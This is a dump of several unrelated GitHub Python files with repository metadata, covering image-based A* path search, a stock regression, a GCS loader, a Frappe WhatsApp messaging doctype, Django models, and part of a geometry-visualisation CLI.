"36230537976", "text": "import cv2\nimport numpy as np \n\nclass Node:\n def __init__(self, parent=None, position=None):\n self.parent = parent\n self.position = position\n self.g = 0\n self.h = 0\n self.f = 0\n def __eq__(self, other):\n return self.position == other.position\n \ndef return_path(current_node):\n path =[]\n current = current_node\n while current is not None:\n path.append(current.position)\n current = current.parent\n path = path[::-1]\n return path\n\ndef search(maze, cost, start, end):\n start_node = Node(None, tuple(start))\n start_node.g = start_node.h = start_node.f = 0\n end_node = Node(None, tuple(end))\n end_node.g = end_node.h = end_node.f = 0\n yet_to_visit_list = [] \n visited_list = [] \n yet_to_visit_list.append(start_node)\n move = [[-1, 0 ], [ 0, -1], [ 1, 0 ],[ 0, 1 ]]\n no_rows,no_columns= np.shape(maze)\n while len(yet_to_visit_list) > 0:\n current_node = yet_to_visit_list[0]\n current_index = 0\n for index, item in enumerate(yet_to_visit_list):\n if item.f < current_node.f:\n current_node = item\n current_index = index\n yet_to_visit_list.pop(current_index)\n visited_list.append(current_node)\n if current_node == end_node:\n return return_path(current_node)\n children = []\n for new_position in move: \n node_position = (current_node.position[0] + new_position[0], current_node.position[1] + new_position[1])\n if (node_position[0] > (no_rows - 1) or node_position[0] < 0 or node_position[1] > (no_columns -1) or node_position[1] < 0):\n continue\n if maze[node_position[0]][node_position[1]] != 0:\n continue\n new_node = Node(current_node, node_position)\n children.append(new_node)\n for child in children:\n if len([visited_child for visited_child in visited_list if visited_child == child]) > 0:\n continue\n child.g = current_node.g + cost\n child.h = (((child.position[0] - end_node.position[0]) ** 2) + ((child.position[1] - end_node.position[1]) ** 2)) \n child.f = child.g + child.h\n if len([i for i in yet_to_visit_list if child == i and child.g > i.g]) > 0:\n continue\n yet_to_visit_list.append(child)\n #print(child.position[0],child.position[1])\n\nif __name__==\"__main__\":\n \n #b2\n #end=[505,549]\n #start=[431,272]\n #start=[100,490]\n #start=[600,560]\n #start=[169,410]\n #------------\n #start=[645,318]-1st\n start=[620,134]#-2nd\n end=[502,570]\n #end=[320,568]\n #end=[155,567]\n cost=1\n img = cv2.imread(r\"C:\\Users\\SUSMITHA\\AppData\\Local\\Programs\\Python\\Python39\\final.jpg\",1)\n cropped_img=img[789:1867,153:3340]\n copy_img=cv2.resize(cropped_img,(700,700))\n cv2.imwrite(\"sq.jpg\",copy_img)\n gray_img = cv2.cvtColor(copy_img,cv2.COLOR_RGB2GRAY)\n gray_img = cv2.GaussianBlur(gray_img, (3,3), 0)\n ret,thresh1 = cv2.threshold(gray_img,230,255,cv2.THRESH_BINARY_INV)\n height=thresh1.shape[1]\n width=thresh1.shape[0]\n maze=[]\n for y in range(width):\n n=[]\n for x in range(height):\n n.append(int(thresh1[y,x]/255))\n maze.append(n)\n ma=[[maze[j][i] for j in range(len(maze))] for i in range(len(maze[0]))]\n path=[]\n path=search(ma,cost,start,end)\n if((copy_img[tuple(start)][0]==1 or copy_img[tuple(start)][1]==1 or copy_img[tuple(start)][2]==1 )or (copy_img[tuple(end)][0]==1 or copy_img[tuple(end)][1]==1 or copy_img[tuple(end)][2]==1)):\n print(\"No possible path\")\n elif not path:\n cv2.circle(copy_img, tuple(start), 5,(0,0,255),-1)\n cv2.circle(copy_img, tuple(end), 5,(0,0,255),-1)\n cv2.imshow(\"result\",copy_img)\n print(\"No possible path\")\n else:\n pa=[[path[j][i] for j in range(len(path))] for i in range(len(path[0]))]\n pa.pop()\n cv2.circle(copy_img, tuple(start), 5,(0,0,255),-1)\n cv2.circle(copy_img, tuple(end), 5,(0,0,255),-1)\n for i in range(len(path)-1):\n cv2.line(copy_img,path[i],path[i+1],(255,0,0),3)\n cv2.imshow(\"result\",copy_img)\n cv2.imwrite(\"result.jpg\",copy_img)\n cv2.waitKey(0)\n", "repo_name": "Joshna-Rajendran/Indoor_Positioning_Beacons", "sub_path": "Positioing/image_processing_2.py", "file_name": "image_processing_2.py", "file_ext": "py", "file_size_in_byte": 4318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.shape", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 79, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 83, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 85, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 102, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "1918294174", "text": "import pandas as pd\nimport quandl\nimport math, datetime\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\nfrom sklearn import preprocessing, cross_validation, svm\nfrom sklearn.linear_model import LinearRegression\nimport pickle\n\n# Problem with this : we are feeding \"future\" prices as label into algorithm,\n# the machine learning algorithm figures that we had shifted\n# the prices 0.01*len into the past lol\n\ndf = quandl.get('WIKI/GOOGL')\ndf = df[['Adj. Open', 'Adj. High', 'Adj. Low', 'Adj. Close', 'Adj. Volume']]\n\"\"\"\nhigh and low -> diff -> volutality\nopen and clode -> price go up or down\nSimple regression will not be able to identify these relationships\nSo its better if we are able to extract these relationships first and use\nregression on that instead of just numbers.\n\"\"\"\ndf['high_low_perc_change'] = ((df['Adj. High'] - df['Adj. Low'])/df['Adj. High'])*100.0\ndf['close_open_perc_change'] = ((df['Adj. Close'] - df['Adj. Open'])/df['Adj. Open'])*100.0\ndf = df[['Adj. Close', 'high_low_perc_change', 'close_open_perc_change', 'Adj. Volume']]\n\n# print(df.head())\n\nforecast_col = 'Adj. Close'\n# -99999 will just set it as an outlier, advantage-> we are not getting rid of the data\ndf.fillna(-99999, inplace=True)\n\n# predict 10%\nforecast_out = int(math.ceil(0.01*len(df)))\n\n# so now we are shifting up by 30 days, so we will have a label col\n# day for any row given we will have the label col with it closing price after 30 days\ndf['label'] = df[forecast_col].shift(-forecast_out)\n# print(df.head())\n\n# {0 or ‘index’, 1 or ‘columns’}, default 0\nx = np.array(df.drop(['label'],1))\n\"\"\"\nSource: Sklearn, https://scikit-learn.org/stable/modules/preprocessing.html\nStandardization of datasets is a common requirement for many machine\nlearning estimators implemented in scikit-learn;\nthey might behave badly if the individual features do not more or less\nlook like standard normally distributed data: Gaussian with zero mean and unit variance.\nIn practice we often ignore the shape of the distribution and just transform the data to\ncenter it by removing the mean value of each feature, then scale it by dividing\nnon-constant features by their standard deviation.\n\nFor instance, many elements used in the objective function of a learning\nalgorithm (such as the RBF kernel of Support Vector Machines or the l1 and\nl2 regularizers of linear models) assume that all features are centered around\nzero and have variance in the same order. If a feature has a variance that is\norders of magnitude larger than others,\nit might dominate the objective function and make the estimator unable to learn\nfrom other features correctly as expected.\n\"\"\"\nx = preprocessing.scale(x)\nx_pred = x[-forecast_out:]\nx = x[:-forecast_out]\ndf.dropna(inplace=True)\n# print(len(x),len(y))\ny = np.array(df['label'])\n\n# splitting the data into 20% test data\nx_train, x_test, y_train, y_test = cross_validation.train_test_split(x, y, test_size=0.2)\n# we can thread massively in linear regression as well, usinh n_jobs\n# -1 for as many as possible on your system, significantly faster training period\nclf = LinearRegression(n_jobs=-1)\n# clf = svm.SVR()\n# train\n#clf.fit(x_train, y_train)\n\n# saving the classifier\n#with open('stock_regression_clf.pickle','wb') as file:\n# pickle.dump(clf,file)\n\npickle_in = open('stock_regression_clf.pickle','rb')\nclf = pickle.load(pickle_in)\n\n# test\naccuracy = clf.score(x_test, y_test)\n# sq. error\nprint(str(accuracy*100.0)+\"%\")\n\n# make pred\ny_pred = clf.predict(x_pred)\n# print(y_pred, accuracy)\n\n\n# plotting\nstyle.use('ggplot')\ndf['Forecast'] = np.nan\n\nlast_date = df.iloc[-1].name\nlast_unix = last_date.timestamp()\none_day = 86400\nnext_unix = last_unix + one_day\n\nfor i in y_pred:\n next_date = datetime.datetime.fromtimestamp(next_unix)\n next_unix += 86400\n df.loc[next_date] = [np.nan for _ in range(len(df.columns)-1)]+[i]\n # print(df.loc[next_date])\n\ndf['Adj. Close'].plot()\ndf['Forecast'].plot()\nplt.legend(loc=4)\nplt.xlabel('Date')\nplt.ylabel('Price')\nplt.show()\n", "repo_name": "Satwik95/ML-practice", "sub_path": "regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 4028, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "quandl.get", "line_number": 15, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 62, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.cross_validation", "line_number": 70, "usage_type": "name"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 73, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.style.use", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.style", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 107, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "3673115501", "text": "\"\"\"Python module related to load data\"\"\"\n\nfrom prefect_gcp.credentials import GcpCredentials\nfrom google.cloud import storage\n\ndef load_file_into_memory(\n load_dir: str, file_name: str, extension: str, load_location: str = \"local\"\n):\n\n \"\"\"Load a file to stream\n\n Parameters\n ----------\n load_dir : str\n The directory to load the file from\n file_name : str\n The name of the file to load\n extension : str\n The extension of the file\n load_location : str, optional\n The location to load the file from, by default \"local\"\n \"\"\"\n\n # Construct the load file path\n file_name_with_suffix_and_extension = f\"{file_name}.{extension}\"\n load_path = f\"{load_dir}/{file_name_with_suffix_and_extension}\"\n\n if load_location == \"gcs\":\n\n # Load Credentials and Config\n gcp_credentials = GcpCredentials.load(\"gcp-credentials\")\n project_id = gcp_credentials.project\n\n # Init Client\n client = storage.Client(project=project_id)\n gcs_bucket = client.get_bucket(\"serpapi_jobs\") \n\n # Download from GCS\n blob = gcs_bucket.blob(load_path)\n bytes = blob.download_as_bytes()\n\n return bytes\n\n", "repo_name": "m-p-esser/data-job-pipeline", "sub_path": "src/etl/load.py", "file_name": "load.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "prefect_gcp.credentials.GcpCredentials.load", "line_number": 31, "usage_type": "call"}, {"api_name": "prefect_gcp.credentials.GcpCredentials", "line_number": 31, "usage_type": "name"}, {"api_name": "google.cloud.storage.Client", "line_number": 35, "usage_type": "call"}, {"api_name": "google.cloud.storage", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "2420807694", "text": "\nimport frappe\nimport requests\nimport json\nfrom datetime import datetime\n#from frappe.model.document import Document\n\n#class WhatsappPost(Document):\n#\tpass\nfrom frappe.model.document import Document\n\nclass WhatsappPost(Document):\n\tdef validate(self):\n\t\tif self.scheduled_time:\n\t\t\tcurrent_time = frappe.utils.now_datetime()\n\t\t\tscheduled_time = frappe.utils.get_datetime(self.scheduled_time)\n\t\t\tif scheduled_time < current_time:\n\t\t\t\tfrappe.throw((\"Scheduled Time must be future time.\"))\n#\t\tfrappe.db.set_value(post_status = 'Scheduled'\n#\t\tfrappe.db.commit()\n\t\tself.template_status()\n\tdef template_status(self):\n\t\ttemp = frappe.get_doc('Whatsapp Template',self.message_template)\n\t\tif temp.temp_status == 'Approved':\n\t\t\tpass\n\t\telse:\n\t\t\tfrappe.throw(('Whatsapp Template status not Approved yet, update the status or try again later'))\n\n\tdef after_insert(self):\n#\t\tfrappe.db.set_value(\"Whatsapp Post\",self.name,\"post_status\",'Scheduled')\n#\t\tfrappe.db.commit()\n#\t\tself.append('campaign_status',{'title':self.name,'sent_status':'0','pending_status':'0','read_status':'0','failed_status':'0'})\n\t\tself.post_status = 'Scheduled'\n\t\tself.save()\n\n\t@frappe.whitelist()\n\tdef message_post(self):\n\n\t\tprint(self.message_template)\n\t\t# MessageBird Access Token\n\t\tmessagebird_doc = frappe.get_single('Messagebird Setting')\n\t\tmessagebird_token = messagebird_doc.get_password('access_token')\n\t\t# Whatsapp Sender Access Token\n\t\twhatsapp_token = frappe.get_value('Whatsapp Setting',self.msg_sender,'whatsapp_access_token')\n\t\t# Whatsapp Message Template\n\t\tmessage = self.message_template\n\t\t# Recipents\n\t\tcontact_table = frappe.get_doc('Contact Group',self.msg_to)\n\t\tprint('loop')\n\t\tfor entry in contact_table.contact:\n\t\t\tprint('loop0')\n\t\t\tnumber = frappe.get_value('Customer',((frappe.get_doc('Contact Group Member',entry.get('contacts'))).contact),'mobile_no')\n\t\t\tprint(number)\n\t\t\tresponse = self.post(messagebird_token,whatsapp_token,message,number)\n\t\t\tresponse = json.loads(response)\n\n\t\t\t#Creating message\n\n#\t\t\tdoc = frappe.new_doc('Message')\n#\t\t\tdoc.message_text = message\n#\t\t\tdoc.message_id = response['id']\n#\t\t\tdoc.contact_id = frappe.get_doc('Sync contact',frappe.get_doc('Contact Group Member',entry.get('contacts')).contact).customer_id\n#\t\t\tdoc.insert()\n\n\n#\t\t\ttime = re.search(r'\\d{2}:\\d{2}:\\d{2}', response['updatedDatetime']).group()\n#\t\t\tdate = re.search(r'\\d{4}-\\d{2}-\\d{2}', response['updatedDatetime']).group()\n#\n#\t\t\tdate_time = datetime.strptime(f'{date} {time}', '%Y-%m-%d %H:%M:%S')\n#\t\t\tdate_time_format = date_time.strftime(\"%d-%m-%Y %H:%M:%S\")\n\t\t\t#Linking Message to Contact\n\n\t\t\tdoc = frappe.get_doc('Sync contact',frappe.get_doc('Contact Group Member',entry.get('contacts')).contact)\n\t\t\tdoc.append(\"message\",{\"status_update_time\":frappe.utils.now_datetime(),\"status\":response[\"status\"].upper(),\"campaign\":self.name,\"sent_time\":frappe.utils.now_datetime(),\"message_text\": message,\"message_id\":response['id'],\"contact_id\":frappe.get_doc('Sync contact',frappe.get_doc('Contact Group Member',entry.get('contacts')).contact).customer_id})\n\t\t\tdoc.save()\n\n\t\tfrappe.db.set_value(\"Whatsapp Post\",self.name,\"post_status\",'Posted')\n\t\tfrappe.db.commit()\n\tdef post(self,messagebird_token,whatsapp_token,message,number):\n\t\tprint('defi')\n\t\turl = \"https://conversations.messagebird.com/v1/send\"\n\t\tpayload = json.dumps({\n \t\t\t\"to\": number,\n \t\t\t\"from\": whatsapp_token,\n \t\t\t\"type\": \"hsm\",\n \t\t\t\"content\": {\n\t\t\t\t\"hsm\": {\n\t\t\t\t\t\"namespace\": \"5ba2d0b7_f2c6_433b_a66e_57b009ceb6ff\",\n\t\t\t\t\t\"templateName\": message,\n\t\t\t\t\t\"language\": {\n\t\t\t\t\t\"policy\": \"deterministic\",\n\t\t\t\t\t\"code\": \"en\"\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\n\t\theaders = {\n\t\t\t'Authorization': f'AccessKey {messagebird_token}',\n\t\t\t'Content-Type': 'application/json'\n\t\t\t}\n\n\t\tresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\t\tprint(response.text)\n\t\treturn response.text\n#\t\t\tprint(number)\n\n#\t\tprint(messagebird_token)\n#\t\tprint(whatsapp_token)\n#\t\tprint(message)\n\n#\tdef after_insert(self):\n#\t\tself.append('campaign_status',{'title':self.name,'sent_status':'0','pending_status':'0','read_status':'0','failed_status':'0'})\n#\t\tself.save()\n\n#\t@frappe.whitelist()\n#\tdef update_status(self):\n#\t\tsent = frappe.db.get_values(\"Whatsapp Messages\",{'campaign':self.name,'status':'SENT'}, 'name', as_dict=1)\n#\t\tprint(f'\\n\\nCamp list{sent}')\n#\t\tdoc = frappe.get_doc('Whatsapp Status',self.name)\n#\t\tprint('f\\n\\n Doctype{doc.name}')\n#\t\tdoc.sent_status = len(sent)\n#\t\tdoc.save()\n\ndef process_scheduled_whatsapp_message():\n\tposts = frappe.get_list(\n\t\t\"Whatsapp Post\",\n\t\tfilters={\"post_status\": \"Scheduled\", \"docstatus\": 1},\n\t\tfields=[\"name\", \"scheduled_time\"],\n\t)\n\tstart = frappe.utils.now_datetime()\n\tend = start + datetime.timedelta(minutes=10)\n\tfor post in posts:\n\t\tif post.scheduled_time:\n\t\t\tpost_time = frappe.utils.get_datetime(post.scheduled_time)\n\t\t\tif post_time > start and post_time <= end:\n\t\t\t\twhatsapp_post = frappe.get_doc(\"Whatsapp Post\", post.name)\n\t\t\t\twhatsapp_post.message_post()\n", "repo_name": "HarshMagiya7/messaging-blaster", "sub_path": "contact_grouping/contact_grouping/doctype/whatsapp_post/whatsapp_post.py", "file_name": "whatsapp_post.py", "file_ext": "py", "file_size_in_byte": 4912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "frappe.model.document.Document", "line_number": 12, "usage_type": "name"}, {"api_name": "frappe.utils.now_datetime", "line_number": 15, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 15, "usage_type": "attribute"}, {"api_name": "frappe.utils.get_datetime", "line_number": 16, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 16, "usage_type": "attribute"}, {"api_name": "frappe.throw", "line_number": 18, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 23, "usage_type": "call"}, {"api_name": "frappe.throw", "line_number": 27, "usage_type": "call"}, {"api_name": "frappe.get_single", "line_number": 41, "usage_type": "call"}, {"api_name": "frappe.get_value", "line_number": 44, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 48, "usage_type": "call"}, {"api_name": "frappe.get_value", "line_number": 52, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 52, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 73, "usage_type": "call"}, {"api_name": "frappe.utils.now_datetime", "line_number": 74, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 74, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 74, "usage_type": "call"}, {"api_name": "frappe.db.set_value", "line_number": 77, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 77, "usage_type": "attribute"}, {"api_name": "frappe.db.commit", "line_number": 78, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 78, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 82, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 103, "usage_type": "call"}, {"api_name": "frappe.get_list", "line_number": 126, "usage_type": "call"}, {"api_name": "frappe.utils.now_datetime", "line_number": 131, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 131, "usage_type": "attribute"}, {"api_name": "datetime.datetime.timedelta", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "frappe.utils.get_datetime", "line_number": 135, "usage_type": "call"}, {"api_name": "frappe.utils", "line_number": 135, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "33181584374", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lessons', '0010_auto_20140926_1909'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='practice',\n name='timing_and_music',\n field=models.ForeignKey(blank=True, to='lessons.Instructor', null=True),\n preserve_default=True,\n ),\n ]\n", "repo_name": "swoloszynski/salsa-lessons", "sub_path": "lessons/migrations/0011_practice_timing_and_music.py", "file_name": "0011_practice_timing_and_music.py", "file_ext": "py", "file_size_in_byte": 481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "26867401270", "text": "from typing import Any\nfrom django.db import models\nfrom django.utils import timezone\nfrom datetime import datetime\n# Create your models here.\n\n\n\n\nclass UserInfo(models.Model):\n \"\"\"用户表\"\"\"\n name = models.CharField(verbose_name=\"姓名\",max_length=32)\n password = models.CharField(verbose_name=\"密码\",max_length=64)\n age = models.IntegerField(verbose_name=\"年龄\",default=0)\n account = models.DecimalField(verbose_name=\"账户余额\",max_digits=10,decimal_places=2,default=0)\n create_time = models.DateTimeField(verbose_name=\"入职时间\") #default=timezone.now ,default=datetime.now()\n\n\n #有关联的\n # -to 与哪张表关联\n # -to_field 与表中的列关联\n #生成数据列 depart_id\n \n\n #1.部门id置空\n # on_delete=models.CASCADE,null=True,blank=True \n # 2.部门删除;\n # on_delete=models.CASCADE删除用户 \n depart = models.ForeignKey(verbose_name='部门',to=\"Department\",to_field=\"id\",on_delete=models.SET_NULL,null=True,blank=True)\n\n gender_choices = (\n (1,\"男\"),\n (2,\"女\"),\n )\n gender = models.SmallIntegerField(verbose_name=\"性别\",choices=gender_choices)\n\n\n\nclass Department(models.Model):\n \"\"\"\"部门表\"\"\"\n title = models.CharField(verbose_name=\"部门\",max_length=32)\n\n #返回对象\n def __str__(self):\n return self.title\n\nclass Prettynumber(models.Model):\n \"\"\"号码池\"\"\"\n phone = models.CharField(verbose_name=\"手机号\",max_length=11)\n price = models.IntegerField(verbose_name=\"价格\",default=0)\n\n\n level_choices = (\n (1,\"1级用户\"), \n (2,\"2级用户\"),\n (3,\"3级用户\"),\n (4,\"4级用户\"),\n )\n level = models.SmallIntegerField(verbose_name=\"等级\",choices=level_choices)\n\n status_choices = (\n (1,\"占用\"),\n (2,\"未占用\"),\n )\n status = models.SmallIntegerField(verbose_name=\"状态\",choices=status_choices)\n \n #返回对象\n def __str__(self):\n return self.phone\n", "repo_name": "373106698/django", "sub_path": "app01/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.Model", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 12, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.SET_NULL", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.db.models.SmallIntegerField", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 50, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 50, "usage_type": "name"}, {"api_name": "django.db.models.SmallIntegerField", "line_number": 59, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.SmallIntegerField", "line_number": 65, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "12072223724", "text": "import getopt\nimport sys\nimport cli\nimport os\nfrom solver import dispatch\nfrom step import geolog, solverviz\nimport html\n\ndef parse_cl():\n \"\"\" Parse command line \"\"\"\n additionnal_options = []\n # First check for a configuration file in working directory\n if os.path.isfile(\"./geoviz.conf\"):\n config_file = open(\"./geoviz.conf\")\n additionnal_options = config_file.read().replace('\\n', '').split(' ')\n config_file.close\n\n arg_list = additionnal_options + sys.argv[1:]\n print(arg_list)\n return getopt.getopt(arg_list, cli.shortoptions, cli.longoptions)\n\ndef handle_cl(args):\n \"\"\" Execute according to options. Leaving remaining value-options (and\n positional arguments) in a dictionnary \"\"\"\n\n # Fill dictionnary with default values\n opt_dict = {\n '--geolog_path': \"./Geolog\",\n '--solverviz_path': \"./SolverViz\",\n '--solver': \"proge\",\n '--graphics': \"geogebra\",\n '--output': \"out\",\n '--keep_files': False\n }\n\n # For each argument, fill the dictionnary or take corresponding action\n for opt, val in args[0]:\n if opt == '-h' or opt == '--help':\n print_help()\n exit()\n if opt == '-v' or opt == '--version':\n print_version()\n exit()\n # Translate corresponding short / long options\n if opt in cli.options_corres.keys():\n opt = cli.options_corres[opt]\n # Fill the dictionnary\n opt_dict[opt] = val\n if opt == '--keep_files':\n opt_dict['--keep_files'] = True\n\n if not ('--solver_path' in opt_dict.keys()):\n if opt_dict['--solver'] == 'proge':\n opt_dict['--solver_path'] = './Proge'\n\n # If the number of positional arguments is incorrect, print usage and exit\n if len(args[1]) != 1:\n print_usage()\n exit(1)\n opt_dict['input_file'] = args[1][0]\n return opt_dict\n\ndef print_version():\n print(f\"Geoviz v{cli.version}\")\n\ndef print_help():\n \"\"\" Print help string \"\"\"\n print_version()\n print_usage()\n print(\"Options: \")\n for opt, help_string in cli.options_info:\n print(\"{0: <15s} {1: \")\n\nif __name__ == '__main__':\n # Start by parsing command line arguments\n options = handle_cl(parse_cl())\n\n # Initialize cleanup list\n cleanup = []\n\n print(f\"Creating and running language layer...\")\n # Create our first layer (geolog)\n language_layer = geolog.Geolog(options['--geolog_path'],\n options['input_file'], \"tmp\")\n language_layer.set_solver(options['--solver'])\n # Run language layer\n inter_file = language_layer.run()\n cleanup.append(inter_file)\n\n print(f\"Creating and running solver layer...\")\n # Create solver layer\n solve = dispatch.instanciate_solver(options['--solver'],\n options['--solver_path'], inter_file, \"tmp\")\n # Run solver layers\n viz_file = solve.run()\n print(viz_file)\n cleanup.append(viz_file)\n\n # We're going to add the input file as text in the figure\n # First, read the input file\n file = open(options['input_file'], \"r\")\n file_string = \"\\\"\" + file.read() + \"\\\"\"\n file_string = file_string.replace(\"\\n\", \"\\\\\\\\n\")\n escaped_string = html.escape(file_string)\n file.close()\n\n # Then append the text to the viz file\n command = f\"echo '\\n' >> {viz_file}\"\n print(f\"Adding statement to figure command: {command}\")\n if os.system(command) != 0:\n print(\"Failed to add the problem statement in the graphic file\")\n\n\n\n print(f\"Creating and running graphic layer...\")\n # Create graphic export layer\n graphic_layer = solverviz.SolverViz(options['--solverviz_path'], viz_file,\n options['--output'])\n # Specify the display backend to use\n graphic_layer.set_display(options['--graphics'])\n # Run graphic export layer\n out_file = graphic_layer.run()\n\n if not options['--keep_files']:\n for file in cleanup:\n if os.system(f\"rm {file}\") != 0:\n print(\"File cleanup failed !\")\n", "repo_name": "Raphalex46/GeoViz", "sub_path": 